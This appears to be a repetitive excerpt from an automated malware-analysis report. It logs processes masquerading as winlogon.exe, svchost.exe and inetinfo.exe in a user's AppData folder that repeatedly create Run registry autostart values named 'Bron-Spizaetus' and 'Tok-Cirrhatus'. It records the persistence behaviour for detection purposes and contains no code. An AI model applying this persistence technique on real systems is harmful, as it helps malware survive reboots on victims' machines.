                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\inetinfo.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\inetinfo.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\inetinfo.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\inetinfo.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
